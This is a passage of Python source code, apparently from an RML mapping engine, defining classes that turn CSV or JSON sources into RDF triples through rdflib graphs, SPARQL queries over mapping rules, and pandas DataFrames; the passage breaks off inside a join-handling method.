def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
pass
class ObjectMap(AbstractMap):
def to_rdf(self):
g = Graph('IOMemory')
g.add((self._id, RDF.type, rml_vocab.OBJECT_MAP_CLASS))
return g
def apply(self, df):
pass
def apply_(self, row):
pass
@staticmethod
@abstractclassmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
pass
class ConstantObjectMap(ObjectMap):
def __init__(self, value: Node, map_id: URIRef = None):
super().__init__(map_id, value)
self.__value = value
def to_rdf(self) -> Graph:
g = super().to_rdf()
g.add((self._id, rml_vocab.CONSTANT, self.__value))
return g
def apply(self, df: DataFrame):
return df.apply(lambda x: self.__value, axis=1)
def apply_(self, row):
return self.__value
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?c
WHERE {
{
?p rr:constant ?c1
BIND(?c1 AS ?c)
}
UNION
{
OPTIONAL{?p rr:constant ?c2}
FILTER(!BOUND(?c2))
FILTER(isIRI(?p))
BIND(?p AS ?c)
}
}""",
initNs = { "rr": rml_vocab.RR})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
c = None
if isinstance(row.p, URIRef):
if row.p in mappings_dict:
c = mappings_dict.get(row.p)
else:
c = ConstantObjectMap(row.c, row.p)
mappings_dict.add(c)
else:
c = ConstantObjectMap(row.c)
term_maps.add(c)
return term_maps
class LiteralObjectMap(ObjectMap):
def __init__(self, reference: Literal = None, template: Literal = None, term_type : URIRef = None, language : Literal = None, datatype : URIRef = None, map_id: URIRef = None):
super().__init__(map_id, reference if reference is not None else template)
self._reference = reference
self._template = template
self._term_type = term_type
self._language = language
self._datatype = datatype
def to_rdf(self) -> Graph:
g = super().to_rdf()
if self._reference is not None:
g.add((self._id, rml_vocab.REFERENCE, self._reference))
elif self._template is not None:
g.add((self._id, rml_vocab.TEMPLATE, self._template))
if self._term_type is not None:
g.add((self._id, rml_vocab.TERM_TYPE, self._term_type))
if self._language is not None:
g.add((self._id, rml_vocab.LANGUAGE, self._language))
elif self._datatype is not None:
g.add((self._id, rml_vocab.DATATYPE, self._datatype))
return g
def __convertion(self, row):
literal = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
if self._template is not None:
value = TermUtils.eval_functions(self._template.value, row, False)
if value != value:
literal = None
elif self._language is not None:
language = TermUtils.eval_functions(self._language.value, row, False)
literal = Literal(value, lang=language)
elif self._datatype is not None:
datatype = TermUtils.eval_functions(str(self._datatype), row, False)
literal = Literal(value, datatype=datatype)
else:
literal = Literal(value)
return literal
def apply(self, df: DataFrame):
l = lambda x: self.__convertion(x)
df_1 = df.apply(l, axis=1)
return df_1
def apply_(self, row):
literal = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
if self._template is not None:
#value = TermUtils.eval_template(self._expression, row, False)
self._expression.eval(row, False)
if value != value:
literal = None
elif self._language is not None:
#language = TermUtils.eval_functions(self._language.value, row, False)
literal = Literal(value, lang=self._language.value)
elif self._datatype is not None:
#datatype = TermUtils.eval_functions(str(self._datatype), row, False)
literal = Literal(value, datatype=self._datatype)
else:
literal = Literal(value)
return literal
#return self.__convertion(row)
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?reference ?template ?tt ?language ?datatype
WHERE {
OPTIONAL{?p rml:reference ?reference}
OPTIONAL{?p rr:template ?template}
OPTIONAL{?p rr:termType ?tt}
OPTIONAL {?p rr:language ?language}
OPTIONAL {?p rr:datatype ?datatype}
}""",
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML
})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
term_maps.add(LiteralObjectMap(row.reference, row.template, row.tt, row.language, row.datatype, row.p))
return term_maps
class TermObjectMap(ObjectMap):
def __init__(self, reference: Literal = None, template: Literal = None, constant: Union[Literal, URIRef] = None, term_type : URIRef = rml_vocab.LITERAL, language : Literal = None, datatype : URIRef = None, map_id: URIRef = None):
super().__init__(map_id, reference if reference is not None else template)
self._reference = reference
self._template = template
self._constant = constant
self._term_type = term_type
self._language = language
self._datatype = datatype
def to_rdf(self) -> Graph:
g = super().to_rdf()
if self._reference is not None:
g.add((self._id, rml_vocab.REFERENCE, self._reference))
elif self._constant is not None:
g.add((self._id, rml_vocab.CONSTANT, self._reference))
elif self._template is not None:
g.add((self._id, rml_vocab.TEMPLATE, self._template))
if self._term_type is not None:
g.add((self._id, rml_vocab.TERM_TYPE, self._term_type))
if self._language is not None:
g.add((self._id, rml_vocab.LANGUAGE, self._language))
elif self._datatype is not None:
g.add((self._id, rml_vocab.DATATYPE, self._datatype))
if self._term_type is not None:
g.add((self._id, rml_vocab.TERM_TYPE, self._term_type))
return g
def __convertion(self, row):
term = None
value = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
if value == value and self._term_type is not None and self._term_type != rml_vocab.LITERAL:
value = TermUtils.irify(value)
else:
value = None
elif self._template is not None:
if self._term_type is None or self._term_type == rml_vocab.LITERAL:
value = TermUtils.eval_functions(self._template.value, row, False)
else:
value = TermUtils.eval_functions(self._template.value, row, True)
elif self._constant is not None:
value = self._constant
if value is not None and value==value:
# The term is a literal
if self._term_type is None or self._term_type == rml_vocab.LITERAL:
if value != value:
term = None
elif self._language is not None:
language = TermUtils.eval_functions(self._language.value, row, False)
term = Literal(value, lang=language)
elif self._datatype is not None:
datatype = TermUtils.eval_functions(str(self._datatype), row, False)
term = Literal(value, datatype=datatype)
else:
term = Literal(value)
else:
if self._term_type == rml_vocab.BLANK_NODE:
term = BNode(value)
else:
term = URIRef(value)
return term
def apply(self, df: DataFrame):
l = lambda x: self.__convertion(x)
df_1 = df.apply(l, axis=1)
return df_1
def apply_(self, row):
term = None
value = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
if value == value and self._term_type is not None and self._term_type != rml_vocab.LITERAL:
value = TermUtils.irify(value)
else:
value = None
elif self._template is not None:
if self._term_type is None or self._term_type == rml_vocab.LITERAL:
#value = TermUtils.eval_template(self._expression, row, False)
value = self._expression.eval(row, False)
else:
#value = TermUtils.eval_template(self._expression, row, True)
value = self._expression.eval(row, True)
elif self._constant is not None:
value = self._constant
if value is not None and value==value:
# The term is a literal
if self._term_type is None or self._term_type == rml_vocab.LITERAL:
if value != value:
term = None
elif self._language is not None:
#language = TermUtils.eval_template(self._language.value, row, False)
term = Literal(value, lang=self._language.value)
elif self._datatype is not None:
#datatype = TermUtils.eval_template(str(self._datatype), row, False)
term = Literal(value, datatype=self._datatype)
else:
term = Literal(value)
else:
if self._term_type == rml_vocab.BLANK_NODE:
term = BNode(value)
else:
term = URIRef(value)
return term
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?reference ?template ?constant ?tt ?language ?datatype
WHERE {
OPTIONAL{?p rml:reference ?reference}
OPTIONAL{?p rr:template ?template}
OPTIONAL{?p rr:constant ?constant}
OPTIONAL{?p rr:termType ?tt}
OPTIONAL {?p rr:language ?language}
OPTIONAL {?p rr:datatype ?datatype}
}""",
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML
})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
term_maps.add(TermObjectMap(row.reference, row.template, row.constant, row.tt, row.language, row.datatype, row.p))
return term_maps
class Predicate(AbstractMap):
def __init__(self, map_id: URIRef = None, mapped_entity: URIRef = None):
super().__init__(map_id, mapped_entity)
@abstractclassmethod
def to_rdf(self) -> Graph:
pass
@abstractclassmethod
def apply(self, df: DataFrame):
pass
@abstractclassmethod
def apply_(self, row):
pass
@staticmethod
@abstractclassmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
pass
class ConstantPredicate(Predicate):
def __init__(self, constant: URIRef, map_id: URIRef = None):
super().__init__(map_id, constant)
self._constant = constant
def to_rdf(self) -> Graph:
g = super().to_rdf()
g.add((self._id, rml_vocab.PREDICATE, self._constant))
return g
def apply(self, df: DataFrame):
return self._constant
def apply_(self, row):
return self._constant
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?predicate
WHERE {
?p rr:predicate ?predicate
}
""",
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML
})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
term_maps.add(ConstantPredicate(row.predicate, row.p))
return term_maps
class PredicateMap(Predicate):
def __init__(self, triple_mapping : Union[BNode, URIRef], reference: Literal = None, template: Literal = None, constant: URIRef = None, map_id: URIRef = None):
super().__init__(map_id, reference if reference is not None else template if template is not None else constant)
self._reference = reference
self._template = template
self._constant = constant
self._triple_mapping = triple_mapping
def to_rdf(self) -> Graph:
g = super().to_rdf()
g.add(self._triple_mapping, rml_vocab.PREDICATE_MAP, self._id)
if self._reference is not None:
g.add((self._id, rml_vocab.REFERENCE, self._reference))
elif self._template is not None:
g.add((self._id, rml_vocab.TEMPLATE, self._template))
elif self._constant is not None:
g.add((self._id, rml_vocab.CONSTANT, self._constant))
return g
def __convertion(self, row):
predicate = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
elif self._template is not None:
value = TermUtils.eval_functions(self._template.value, row, True)
elif self._constant is not None:
value = self._constant
if value != value:
predicate = None
else:
if isinstance(predicate, URIRef):
predicate = value
else:
predicate = URIRef(value)
return predicate
def apply(self, df: DataFrame):
l = lambda x: self.__convertion(x)
df_1 = df.apply(l, axis=1)
return df_1
def apply_(self, row):
predicate = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
elif self._template is not None:
#value = TermUtils.eval_template(self._expression, row, True)
value = self._expression.eval(row, True)
elif self._constant is not None:
value = self._constant
if value != value:
predicate = None
else:
if isinstance(predicate, URIRef):
predicate = value
else:
predicate = URIRef(value)
return predicate
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?tripleMap ?predicateMap ?reference ?template ?constant
WHERE {
?tripleMap rr:predicateMap ?predicateMap
OPTIONAL{?predicateMap rml:reference ?reference}
OPTIONAL{?predicateMap rr:template ?template}
OPTIONAL{?predicateMap rr:constant ?constant}
}""",
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML
})
if parent is not None:
qres = g.query(query, initBindings = { "tripleMap": parent})
else:
qres = g.query(query)
for row in qres:
term_maps.add(PredicateMap(row.tripleMap, row.reference, row.template, row.constant, row.predicateMap))
return term_maps
class PredicateBuilder():
@staticmethod
def build(g: Graph, parent: Union[URIRef, BNode]) -> Set[Predicate]:
ret = None
if (parent, rml_vocab.PREDICATE, None) in g:
ret = ConstantPredicate.from_rdf(g, parent)
elif (parent, rml_vocab.PREDICATE_MAP, None) in g:
ret = PredicateMap.from_rdf(g, parent)
else:
return None
if ret is None or len(ret) == 0:
return None
else:
return ret.pop()
class PredicateObjectMap(AbstractMap):
def __init__(self, predicate: Predicate, object_map: ObjectMap, map_id: URIRef = None):
super().__init__(map_id, predicate)
self._predicate = predicate
self.__object_map = object_map
def get_predicate(self) -> Predicate:
return self._predicate
def get_object_map(self) -> ObjectMap:
return self.__object_map
def to_rdf(self) -> Graph:
g = Graph('IOMemory')
g.add((self._id, RDF.type, rml_vocab.PREDICATE_OBJECT_MAP_CLASS))
g = graph_add_all(g, self._predicate.to_rdf())
g.add((self._id, rml_vocab.OBJECT_MAP, self.__object_map.get_id()))
g = graph_add_all(g, self.__object_map.to_rdf())
#g += self.__object_map.to_rdf()
return g
def apply(self, df: DataFrame):
start_time = time.time()
df_1 = self.__object_map.apply(df)
predicate = self.get_mapped_entity()
if isinstance(predicate, ConstantPredicate):
try:
df_1 = df_1.apply(lambda x: (predicate.apply(df), x))
except:
return None
elif isinstance(predicate, PredicateMap):
try:
df_1 = pd.concat([predicate.apply(df), df_1], axis=1, sort=False)
df_1 = df_1[[0, 1]].apply(tuple, axis=1)
except:
return None
elapsed_time_secs = time.time() - start_time
msg = "\t Predicate Object Map: %s secs" % elapsed_time_secs
print(msg)
return df_1
def apply_(self, row):
obj = self.__object_map.apply_(row)
predicate = self.get_mapped_entity().apply_(row)
if object and predicate:
return (predicate, obj)
else:
return None
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?pom ?predicate ?om
WHERE {
?pom rr:objectMap ?om
}""",
initNs = { "rr": rml_vocab.RR})
if parent is not None:
qres = g.query(query, initBindings = { "pom": parent})
else:
qres = g.query(query)
mapping_dict = RMLConverter.get_instance().get_mapping_dict()
for row in qres:
pom = None
if isinstance(row.pom, URIRef):
if row.pom in mapping_dict:
pom = mapping_dict.get(row.pom)
else:
pom = PredicateObjectMap.__build(g, row)
mapping_dict.add(pom)
else:
pom = PredicateObjectMap.__build(g, row)
term_maps.add(pom)
return term_maps
@staticmethod
def __build(g, row):
mapping_dict = RMLConverter.get_instance().get_mapping_dict()
predicate = PredicateBuilder.build(g, row.pom)
object_map = None
if isinstance(row.om, URIRef):
if row.om in mapping_dict:
object_map = mapping_dict.get(row.om)
else:
object_map = ObjectMapBuilder.build(g, row.om)
mapping_dict.add(object_map)
else:
object_map = ObjectMapBuilder.build(g, row.om)
if predicate is not None and object_map is not None:
return PredicateObjectMap(predicate, object_map, row.pom)
else:
return None;
class ObjectMapBuilder():
@staticmethod
def build(g: Graph, parent: Union[URIRef, BNode]) -> Set[ObjectMap]:
ret = None
if (parent, rml_vocab.PARENT_TRIPLES_MAP, None) in g:
ret = ReferencingObjectMap.from_rdf(g, parent)
else:
ret = TermObjectMap.from_rdf(g, parent)
'''
if (parent, rml_vocab.CONSTANT, None) in g:
ret = ConstantObjectMap.from_rdf(g, parent)
elif (parent, rml_vocab.REFERENCE, None) in g or (parent, rml_vocab.TEMPLATE, None) in g:
ret = LiteralObjectMap.from_rdf(g, parent)
elif (parent, rml_vocab.PARENT_TRIPLES_MAP, None) in g:
ret = ReferencingObjectMap.from_rdf(g, parent)
elif isinstance(parent, URIRef):
ret = ConstantObjectMap.from_rdf(g, parent)
else:
return None
'''
if ret is None or len(ret) == 0:
return None
else:
return ret.pop()
class Join(AbstractMap):
def __init__(self, child: Literal, parent: Literal, map_id: URIRef = None):
super().__init__(map_id)
self.__child = child
self.__parent = parent
def get_child(self) -> str:
return self.__child
def get_parent(self) -> str:
return self.__parent
def to_rdf(self) -> Graph:
g = Graph('IOMemory')
if self.__child is not None and self.__parent is not None:
join = self._id
g.add((join, rml_vocab.CHILD, self.__child))
g.add((join, rml_vocab.PARENT, self.__parent))
return g
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?join ?child ?parent
WHERE {
?p rr:child ?child ;
rr:parent ?parent
}""",
initNs = { "rr": rml_vocab.RR})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
join = None
if isinstance(row.join, URIRef):
join = Join(row.child, row.parent, row.join)
else:
join = Join(child=row.child, parent=row.parent)
term_maps.add(join)
return term_maps
class InputFormatNotSupportedError(Exception):
def __init__(self, format):
self.message = "The format %s is currently not supported"%(format)
class LogicalSource(AbstractMap):
def __init__(self, source: Literal, separator: str = None, map_id: URIRef = None, reference_formulation: URIRef = None, iterator: Literal = None):
super().__init__(map_id, source)
self.__separator = separator
if reference_formulation is None:
self.__reference_formulation = rml_vocab.CSV
else:
self.__reference_formulation = reference_formulation
self.__iterator = iterator
def get_source(self) -> Literal:
return self.get_mapped_entity()
def get_reference_formulation(self) -> URIRef:
return self.__reference_formulation
def get_separator(self) -> str:
return self.__separator
def to_rdf(self):
g = Graph('IOMemory')
g.add((self._id, RDF.type, rml_vocab.BASE_SOURCE))
g.add((self._id, rml_vocab.SOURCE, self.get_source()))
g.add((self._id, rml_vocab.REFERENCE_FORMULATION, self.__reference_formulation))
if self.__iterator is not None:
g.add((self._id, rml_vocab.ITERATOR, self.__iterator))
if self.__separator is not None:
g.add((self._id, rml_vocab.SEPARATOR, self.__separator))
return g
def apply(self):
loaded_logical_sources = RMLConverter.get_instance().get_loaded_logical_sources()
if self._mapped_entity:
logical_source_uri = self._mapped_entity.value
if logical_source_uri in loaded_logical_sources:
return loaded_logical_sources[logical_source_uri]
if self.__separator is None:
sep = ','
else:
sep = self.__separator
if self.__reference_formulation == rml_vocab.JSON_PATH:
jsonpath_expr = parse(self.__iterator)
with open(self._mapped_entity.value) as f:
json_data = json.load(f)
matches = jsonpath_expr.find(json_data)
data = [match.value for match in matches]
df = pd.json_normalize(data)
elif self.__reference_formulation == rml_vocab.CSV:
df = pd.read_csv(self._mapped_entity.value, sep=sep, dtype=str)
else:
raise InputFormatNotSupportedError(self.__reference_formulation)
loaded_logical_sources.update({logical_source_uri: df})
return df
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
sparql = """
SELECT DISTINCT ?ls ?source ?rf ?sep ?ite
WHERE {
?p rml:logicalSource ?ls .
?ls rml:source ?source .
OPTIONAL {?ls rml:referenceFormulation ?rf}
OPTIONAL {?ls crml:separator ?sep}
OPTIONAL {?ls rml:iterator ?ite}
}"""
query = prepareQuery(sparql,
initNs = {
"rml": rml_vocab.RML,
"crml": rml_vocab.CRML
})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
source = row.source
ls = LogicalSource(source, row.sep, row.ls, row.rf, row.ite)
term_maps.add(ls)
return term_maps
class GraphMap(AbstractMap):
def __init__(self, mapped_entity: Node, map_id: URIRef = None):
super().__init__(map_id, mapped_entity)
def to_rdf(self):
g = Graph('IOMemory')
if isinstance(self._mapped_entity, Literal):
g.add((self._id, rml_vocab.TEMPLATE, self._mapped_entity))
elif isinstance(self._mapped_entity, URIRef):
g.add((self._id, rml_vocab.CONSTANT, self._mapped_entity))
return g
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
sparql = """
SELECT DISTINCT ?gm ?g
WHERE {
{ ?p rr:graphMap ?gm .
?gm rr:constant ?g }
UNION
{ ?p rr:graph ?g }
UNION
{ ?p rr:graphMap ?gm .
?gm rr:template ?g }
}"""
query = prepareQuery(sparql,
initNs = { "rr": rml_vocab.RR })
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
graph_map = None
if row.gm is not None:
if isinstance(row.gm, URIRef):
if row.gm in mappings_dict:
graph_map = mappings_dict.get(row.gm)
else:
graph_map = GraphMap(row.g, row.gm)
mappings_dict.add(graph_map)
else:
graph_map = GraphMap(row.g, row.gm)
elif row.g is not None:
graph_map = GraphMap(mapped_entity=row.g)
term_maps.add(graph_map)
return term_maps
class SubjectMap(AbstractMap):
def __init__(self, mapped_entity: Node, term_type: Literal, class_: Set[URIRef] = None, graph_map: GraphMap = None, map_id: URIRef = None):
super().__init__(map_id, mapped_entity)
self.__class = class_
self.__graph_map = graph_map
self.__term_type = term_type
def get_class(self) -> URIRef:
return self.__class
def get_graph_map(self) -> GraphMap:
return self.__graph_map
def to_rdf(self):
g = Graph('IOMemory')
subject_map = self._id
'''
if isinstance(self._mapped_entity, Literal):
g.add((subject_map, rml_vocab.TEMPLATE, self._mapped_entity))
elif isinstance(self._mapped_entity, URIRef):
g.add((subject_map, rml_vocab.CONSTANT, self._mapped_entity))
'''
if self.__term_type == Literal("template"):
g.add((subject_map, rml_vocab.TEMPLATE, self._mapped_entity))
elif self.__term_type == Literal("constant"):
g.add((subject_map, rml_vocab.CONSTANT, self._mapped_entity))
elif self.__term_type == Literal("reference"):
g.add((subject_map, rml_vocab.REFERENCE, self._mapped_entity))
if self.__class is not None:
for c in self.__class:
g.add((subject_map, rml_vocab.CLASS, self.__class))
if self.__graph_map is not None:
graph_map_g = self.__graph_map.to_rdf()
g.add((subject_map, rml_vocab.GRAPH_MAP, self.__graph_map.get_id()))
g = graph_add_all(g, graph_map_g)
#g = g + graph_map_g
return g
def __convert(self, row):
term = None
if self.__term_type == Literal("template") or self.__term_type == Literal("constant"):
term = TermUtils.urify(self._mapped_entity, row)
elif self.__term_type == Literal("reference"):
term = URIRef(row[self._mapped_entity.value])
return term
def apply(self, df: DataFrame):
start_time = time.time()
#l = lambda x: TermUtils.urify(self._mapped_entity, x)
l = lambda x: self.__convert(x)
#l = lambda x: print(x['id'])
df_1 = df.apply(l, axis=1)
df_1.replace('', np.nan, inplace=True)
df_1.dropna(inplace=True)
elapsed_time_secs = time.time() - start_time
msg = "Subject Map: %s secs" % elapsed_time_secs
print(msg)
return df_1
def apply_(self, row):
term = None
if self.__term_type == Literal("template") or self.__term_type == Literal("constant"):
#term = TermUtils.eval_template(self._expression, row, True)
term = self._expression.eval(row, True)
elif self.__term_type == Literal("reference"):
term = URIRef(row[self._mapped_entity.value])
return term
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
sparql = """
SELECT DISTINCT ?sm ?map ?termType ?type ?gm ?g
WHERE {
?p rr:subjectMap ?sm .
{ ?sm rr:template ?map
BIND("template" AS ?termType)
}
UNION
{ ?sm rr:constant ?map
BIND("constant" AS ?termType)
}
UNION
{ ?sm rml:reference ?map
BIND("reference" AS ?termType)
}
OPTIONAL {?sm rr:class ?type}
OPTIONAL {
{ ?sm rr:graphMap ?gm }
UNION
{ ?sm rr:graph ?g }
}
}"""
query = prepareQuery(sparql,
initNs = { "rr": rml_vocab.RR, "rml": rml_vocab.RML})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
subject_maps = {}
for row in qres:
subject_map = None
if isinstance(row.sm, URIRef) and row.sm in mappings_dict:
subject_map = mappings_dict.get(row.sm)
if subject_map is None:
if row.sm.n3() in subject_maps:
subject_map = subject_maps[row.sm.n3()]
subject_map.__class.add(row.type)
else:
subject_map = SubjectMap.__create(row)
subject_maps.update({row.sm.n3(): subject_map})
if isinstance(row.sm, URIRef):
mappings_dict.add(subject_map)
else:
subject_map.__class.add(row.type)
return set(subject_maps.values())
@staticmethod
def __create(row):
graph_map = None
if row.gm is not None or row.g is not None:
graph_map = GraphMap.from_rdf(row.g, row.sm).pop()
return SubjectMap(row.map, row.termType, {row.type}, graph_map, row.sm)
class TripleMappings(AbstractMap):
def __init__(self,
logical_source: LogicalSource,
subject_map: SubjectMap,
predicate_object_maps: Dict[Identifier, ObjectMap] = None,
iri: URIRef = None,
condition: str = None):
super().__init__(iri, logical_source.get_id())
self.__logical_source = logical_source
self.__subject_map = subject_map
self.__predicate_object_maps = predicate_object_maps
self.__condition = condition
def get_logical_source(self) -> LogicalSource:
return self.__logical_source
def get_subject_map(self) -> SubjectMap:
return self.__subject_map
def get_predicate_object_maps(self) -> Dict[Identifier, ObjectMap]:
return self.__predicate_object_maps
def set_predicate_object_maps(self, poms: Dict[Identifier, ObjectMap]):
self.__predicate_object_maps = poms
def get_condition(self):
return self.__condition
def add_object_map(self, object_map: ObjectMap):
if self.__predicate_object_maps is None:
self.__predicate_object_maps = dict()
self.__predicate_object_maps.update({object_map.get_id(), object_map})
def get_object_map(self, identifier: Union[URIRef, BNode]) -> ObjectMap:
return self.__predicate_object_maps.get(identifier)
def to_rdf(self) -> Graph:
g = Graph('IOMemory')
g.add((self._id, RDF.type, rml_vocab.TRIPLES_MAP))
g.add((self._id, rml_vocab.LOGICAL_SOURCE, self.__logical_source.get_id()))
g.add((self._id, rml_vocab.SUBJECT_MAP, self.__subject_map.get_id()))
if self.__condition is not None:
g.add((self._id, rml_vocab.CONDITION, self.__condition))
g = graph_add_all(g, self.__logical_source.to_rdf())
g = graph_add_all(g, self.__subject_map.to_rdf())
#g += self.__logical_source.to_rdf()
#g += self.__subject_map.to_rdf()
for key, value in self.__predicate_object_maps.items():
g.add((self._id, rml_vocab.PREDICATE_OBJECT_MAP, key))
g = graph_add_all(g, value.to_rdf())
#g += value.to_rdf()
return g
@staticmethod
def __triplify_series(entry, entity_types : Set[URIRef], graph : Graph):
try:
graph.add((entry['0_l'], entry['0_r'][0], entry['0_r'][1]))
if entity_types:
TripleMappings.__add_types(entry['0_l'], entity_types, graph)
return graph
except:
pass
@staticmethod
def __add_types(entry, entity_types : Set[URIRef], graph : Graph):
try:
for entity_type in entity_types:
graph.add((entry, RDF.type, entity_type))
return graph
except:
pass
def apply(self):
start_time = time.time()
g = Graph('IOMemory')
df = self.__logical_source.apply()
if self.__condition is not None and self.__condition.strip() != '':
df = df[eval(self.__condition)]
#sbj_representation = self.__subject_map.apply(df)
start_time = time.time()
sbj_representation = df.apply(self.__subject_map.apply_)
elapsed_time_secs = time.time() - start_time
msg = "Subject Map: %s secs" % elapsed_time_secs
print(msg)
if sbj_representation is not None and not sbj_representation.empty:
if self.__predicate_object_maps is not None:
#triplification = lambda x: TripleMappings.__triplify_series(x, self.__subject_map.get_class(), g)
for pom in self.__predicate_object_maps.values():
pom_representation = pom.apply(df)
if pom_representation is not None and not pom_representation.empty:
if isinstance(sbj_representation, pd.Series):
sbj_representation=sbj_representation.to_frame().reset_index()
try:
object_map = pom.get_object_map()
if isinstance(object_map, ReferencingObjectMap) and object_map.get_join_conditions():
pom_representation=pom_representation.to_frame().reset_index()
results = sbj_representation.merge(pom_representation, how='left', suffixes=("_l", "_r"), left_on="index", right_on="index", sort=False)
'''
for k,v in results.iterrows():
try:
g.add((v['0_l'], v['0_r'][0], v['0_r'][1]))
if self.__subject_map.get_class() is not None:
for type in self.__subject_map.get_class():
g.add((v['0_l'], RDF.type, type))
except:
pass
'''
else:
'''
if isinstance(sbj_representation, DataFrame):
results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
else:
results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
#print("---")
#print(pom_representation)
results.columns = ['0_l', '0_r']
#print(results)
'''
results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
results.columns = ['0_l', '0_r']
'''
if isinstance(sbj_representation, DataFrame):
subjs = sbj_representation[0].values
#results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
else:
subjs = sbj_representation.values
print(sbj_representation.to_frame().reset_index())
#results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
poms = pom_representation.values
#df_1 = df_1[[0, 1]].apply(tuple, axis=1)
for subj, p_o in zip(subjs, poms):
try:
g.add((subj, p_o[0], p_o[1]))
if self.__subject_map.get_class() is not None:
for type in self.__subject_map.get_class():
g.add((subj, RDF.type, type))
except:
pass
'''
#results.columns = ['0_l', '0_r']
except Exception as e:
raise e
results = results[['0_l', '0_r']].apply(lambda x: (x['0_l'], x['0_r'][0], x['0_r'][1]), axis=1)
for triple in results.values:
try:
#g.add((v['0_l'], v['0_r'][0], v['0_r'][1]))
g.add(triple)
if self.__subject_map.get_class() is not None:
for type in self.__subject_map.get_class():
g.add((triple[0], RDF.type, type))
except:
pass
elif self.__subject_map.get_class() is not None:
#triplification = lambda x: TripleMappings.__add_types(x, self.__subject_map.get_class(), g)
#sbj_representation.apply(triplification)
for k,v in sbj_representation.iteritems():
try:
g.add((v, RDF.type, self.__subject_map.get_class()))
except:
pass
elapsed_time_secs = time.time() - start_time
msg = "\t Triples Mapping %s: %s secs" % (self._id, elapsed_time_secs)
print(msg)
return g
def apply_subject_map(self):
start_time = time.time()
g = Graph('IOMemory')
df = self.__logical_source.apply()
if self.__condition is not None and self.__condition.strip() != '':
df = df[eval(self.__condition)]
#sbj_representation = self.__subject_map.apply(df)
sbj_representation = df.apply(self.__subject_map.apply_, axis=1)
elapsed_time_secs = time.time() - start_time
msg = "Subject Map: %s secs" % elapsed_time_secs
print(msg)
return sbj_representation
def apply_(self):
start_time = time.time()
msg = "\t TripleMapping %s" % self._id
print(msg)
g = Graph('IOMemory')
df = self.__logical_source.apply()
if self.__condition is not None and self.__condition.strip() != '':
df = df[eval(self.__condition)]
#sbj_representation = self.__subject_map.apply(df)
sbj_representation = df.apply(self.__subject_map.apply_, axis=1)
elapsed_time_secs = time.time() - start_time
#msg = "Subject Map: %s secs" % elapsed_time_secs
#print(msg)
if sbj_representation is not None and not sbj_representation.empty:
if self.__predicate_object_maps is not None:
#triplification = lambda x: TripleMappings.__triplify_series(x, self.__subject_map.get_class(), g)
for pom in self.__predicate_object_maps.values():
#pom_representation = pom.apply(df)
#if isinstance(sbj_representation, pd.Series):
# sbj_representation=sbj_representation.to_frame().reset_index()
try:
object_map = pom.get_object_map()
if isinstance(object_map, ReferencingObjectMap) and object_map.get_join_conditions():
df_left = df
df_left["__pyrml_sbj_representation__"] = sbj_representation
parent_triple_mappings = object_map.get_parent_triples_map()
df_right = parent_triple_mappings.get_logical_source().apply()
pandas_condition = parent_triple_mappings.get_condition()
if pandas_condition:
df_right = df_right[eval(pandas_condition)]
join_conditions = object_map.get_join_conditions()
left_ons = []
